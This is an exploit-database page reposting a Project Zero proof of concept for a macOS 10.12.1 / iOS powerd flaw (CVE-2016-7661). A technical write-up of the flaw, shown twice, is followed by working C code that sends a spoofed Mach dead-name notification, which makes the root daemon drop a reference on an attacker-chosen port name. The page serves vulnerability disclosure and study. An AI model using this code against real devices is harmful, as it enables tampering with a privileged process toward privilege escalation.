[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MacOS Kernel 10.12.1 / iOS < 10.2 - powerd Arbitrary Port Replacement Exploit

Author
Google Security Research
Risk
[
Security Risk High
]
0day-ID
0day-ID-26572
Category
dos / poc
Date add
23-12-2016
CVE
CVE-2016-7661
Platform
multiple
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=976
 
powerd (running as root) hosts the com.apple.PowerManagement.control mach service.
 
It checks in with launchd to get a server port and then wraps that in a CFPort:
 
  pmServerMachPort = _SC_CFMachPortCreateWithPort(
                          "PowerManagement",
                          serverPort, 
                          mig_server_callback, 
                          &context);
 
It also asks to receive dead name notifications for other ports on that same server port:
 
  mach_port_request_notification(
              mach_task_self(),           // task
              notify_port_in,                 // port that will die
              MACH_NOTIFY_DEAD_NAME,      // msgid
              1,                          // make-send count
              CFMachPortGetPort(pmServerMachPort),        // notify port
              MACH_MSG_TYPE_MAKE_SEND_ONCE,               // notifyPoly
              &oldNotify);                                // previous
 
mig_server_callback is called off of the mach port run loop source to handle new messages on pmServerMachPort:
 
  static void
  mig_server_callback(CFMachPortRef port, void *msg, CFIndex size, void *info)
  {
      mig_reply_error_t * bufRequest = msg;
      mig_reply_error_t * bufReply = CFAllocatorAllocate(
          NULL, _powermanagement_subsystem.maxsize, 0);
      mach_msg_return_t   mr;
      int                 options;
 
      __MACH_PORT_DEBUG(true, "mig_server_callback", serverPort);
       
      /* we have a request message */
      (void) pm_mig_demux(&bufRequest->Head, &bufReply->Head);
 
This passes the raw message to pm_mig_demux:
 
  static boolean_t 
  pm_mig_demux(
      mach_msg_header_t * request,
      mach_msg_header_t * reply)
  {
      mach_dead_name_notification_t *deadRequest = 
                      (mach_dead_name_notification_t *)request;
      boolean_t processed = FALSE;
 
      processed = powermanagement_server(request, reply);
 
      if (processed) 
          return true;
       
      if (MACH_NOTIFY_DEAD_NAME == request->msgh_id) 
      {
          __MACH_PORT_DEBUG(true, "pm_mig_demux: Dead name port should have 1+ send right(s)", deadRequest->not_port);
 
          PMConnectionHandleDeadName(deadRequest->not_port);
 
          __MACH_PORT_DEBUG(true, "pm_mig_demux: Deallocating dead name port", deadRequest->not_port);
          mach_port_deallocate(mach_task_self(), deadRequest->not_port);
           
          reply->msgh_bits            = 0;
          reply->msgh_remote_port     = MACH_PORT_NULL;
 
          return TRUE;
      }
 
This passes the message to the MIG-generated code for the powermanagement subsystem, if that fails (because the msgh_id doesn't
match the subsystem for example) then this compares the message's msgh_id field to MACH_NOTIFY_DEAD_NAME.
 
deadRequest is the message cast to a mach_dead_name_notification_t which is defined like this in mach/notify.h:
 
  typedef struct {
      mach_msg_header_t   not_header;
      NDR_record_t        NDR;
      mach_port_name_t not_port;/* MACH_MSG_TYPE_PORT_NAME */
      mach_msg_format_0_trailer_t trailer;
  } mach_dead_name_notification_t;
 
This is a simple message, not a complex one. not_port is just a completely controlled integer which in this case will get passed directly to
mach_port_deallocate.
 
The powerd code expects that only the kernel will send a MACH_NOTIFY_DEAD_NAME message but actually anyone can send this and force the privileged process
to drop a reference on a controlled mach port name :)
 
Multiplexing these two things (notifications and a mach service) onto the same port isn't possible to do safely as the kernel doesn't prevent
user->user spoofing of notification messages - usually this wouldn't be a problem as attackers shouldn't have access to the notification port.
 
You could use this bug to replace a mach port name in powerd (eg the bootstrap port, an IOService port etc) with a one for which the attacker holds the receieve right.
 
Since there's still no KDK for 10.12.1 you can test this by attaching to powerd in userspace and setting a breakpoint in pm_mig_demux at the
mach_port_deallocate call and you'll see the controlled value in rsi.
 
Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555)
 */
 
// ianbeer
 
#if 0
MacOS/iOS arbitrary port replacement in powerd
 
powerd (running as root) hosts the com.apple.PowerManagement.control mach service.
 
It checks in with launchd to get a server port and then wraps that in a CFPort:
 
    pmServerMachPort = _SC_CFMachPortCreateWithPort(
                                                    "PowerManagement",
                                                    serverPort, 
                                                    mig_server_callback, 
                                                    &context);
 
It also asks to receive dead name notifications for other ports on that same server port:
 
    mach_port_request_notification(
                            mach_task_self(),           // task
                            notify_port_in,                 // port that will die
                            MACH_NOTIFY_DEAD_NAME,      // msgid
                            1,                          // make-send count
                            CFMachPortGetPort(pmServerMachPort),        // notify port
                            MACH_MSG_TYPE_MAKE_SEND_ONCE,               // notifyPoly
                            &oldNotify);                                // previous
 
mig_server_callback is called off of the mach port run loop source to handle new messages on pmServerMachPort:
 
    static void
    mig_server_callback(CFMachPortRef port, void *msg, CFIndex size, void *info)
    {
            mig_reply_error_t * bufRequest = msg;
            mig_reply_error_t * bufReply = CFAllocatorAllocate(
                    NULL, _powermanagement_subsystem.maxsize, 0);
            mach_msg_return_t   mr;
            int                 options;
 
            __MACH_PORT_DEBUG(true, "mig_server_callback", serverPort);
             
            /* we have a request message */
            (void) pm_mig_demux(&bufRequest->Head, &bufReply->Head);
 
This passes the raw message to pm_mig_demux:
 
    static boolean_t 
    pm_mig_demux(
            mach_msg_header_t * request,
            mach_msg_header_t * reply)
    {
            mach_dead_name_notification_t *deadRequest = 
                                            (mach_dead_name_notification_t *)request;
            boolean_t processed = FALSE;
 
            processed = powermanagement_server(request, reply);
 
            if (processed) 
                    return true;
             
            if (MACH_NOTIFY_DEAD_NAME == request->msgh_id) 
            {
                    __MACH_PORT_DEBUG(true, "pm_mig_demux: Dead name port should have 1+ send right(s)", deadRequest->not_port);
 
                    PMConnectionHandleDeadName(deadRequest->not_port);
 
                    __MACH_PORT_DEBUG(true, "pm_mig_demux: Deallocating dead name port", deadRequest->not_port);
                    mach_port_deallocate(mach_task_self(), deadRequest->not_port);
                     
                    reply->msgh_bits            = 0;
                    reply->msgh_remote_port     = MACH_PORT_NULL;
 
                    return TRUE;
            }
 
This passes the message to the MIG-generated code for the powermanagement subsystem, if that fails (because the msgh_id doesn't
match the subsystem for example) then this compares the message's msgh_id field to MACH_NOTIFY_DEAD_NAME.
 
deadRequest is the message cast to a mach_dead_name_notification_t which is defined like this in mach/notify.h:
 
    typedef struct {
            mach_msg_header_t   not_header;
            NDR_record_t        NDR;
            mach_port_name_t not_port;/* MACH_MSG_TYPE_PORT_NAME */
            mach_msg_format_0_trailer_t trailer;
    } mach_dead_name_notification_t;
 
This is a simple message, not a complex one. not_port is just a completely controlled integer which in this case will get passed directly to
mach_port_deallocate.
 
The powerd code expects that only the kernel will send a MACH_NOTIFY_DEAD_NAME message but actually anyone can send this and force the privileged process
to drop a reference on a controlled mach port name :)
 
Multiplexing these two things (notifications and a mach service) onto the same port isn't possible to do safely as the kernel doesn't prevent
user->user spoofing of notification messages - usually this wouldn't be a problem as attackers shouldn't have access to the notification port.
 
You could use this bug to replace a mach port name in powerd (eg the bootstrap port, an IOService port etc) with a one for which the attacker holds the receieve right.
 
Since there's still no KDK for 10.12.1 you can test this by attaching to powerd in userspace and setting a breakpoint in pm_mig_demux at the
mach_port_deallocate call and you'll see the controlled value in rsi.
 
Tested on MacBookAir5,2 MacOS Sierra 10.12.1 (16B2555)
#endif
 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
 
#include <servers/bootstrap.h>
#include <mach/mach.h>
#include <mach/ndr.h>
 
char* service_name = "com.apple.PowerManagement.control";
 
struct notification_msg {
    mach_msg_header_t   not_header;
    NDR_record_t        NDR;
    mach_port_name_t not_port;
};
 
mach_port_t lookup(char* name) {
  mach_port_t service_port = MACH_PORT_NULL;
  kern_return_t err = bootstrap_look_up(bootstrap_port, name, &service_port);
  if(err != KERN_SUCCESS){
    printf("unable to look up %s\n", name);
    return MACH_PORT_NULL;
  }
   
  return service_port;
}
 
int main() {
  kern_return_t err;
 
  mach_port_t service_port = lookup(service_name);
 
  mach_port_name_t target_port = 0x1234; // the name of the port in the target namespace to destroy
 
  printf("%d\n", getpid());
  printf("service port: %x\n", service_port);
 
    struct notification_msg not = {0};
 
  not.not_header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
  not.not_header.msgh_size = sizeof(struct notification_msg);
  not.not_header.msgh_remote_port = service_port;
  not.not_header.msgh_local_port = MACH_PORT_NULL;
  not.not_header.msgh_id = 0110; // MACH_NOTIFY_DEAD_NAME
 
    not.NDR = NDR_record;
 
    not.not_port = target_port;
 
  // send the fake notification message
  err = mach_msg(&not.not_header,
                 MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
                 (mach_msg_size_t)sizeof(struct notification_msg),
                 0,
                 MACH_PORT_NULL,
                 MACH_MSG_TIMEOUT_NONE,
                 MACH_PORT_NULL); 
  printf("fake notification message: %s\n", mach_error_string(err));
   
  return 0;
}

#  0day.today [2024-11-16]  #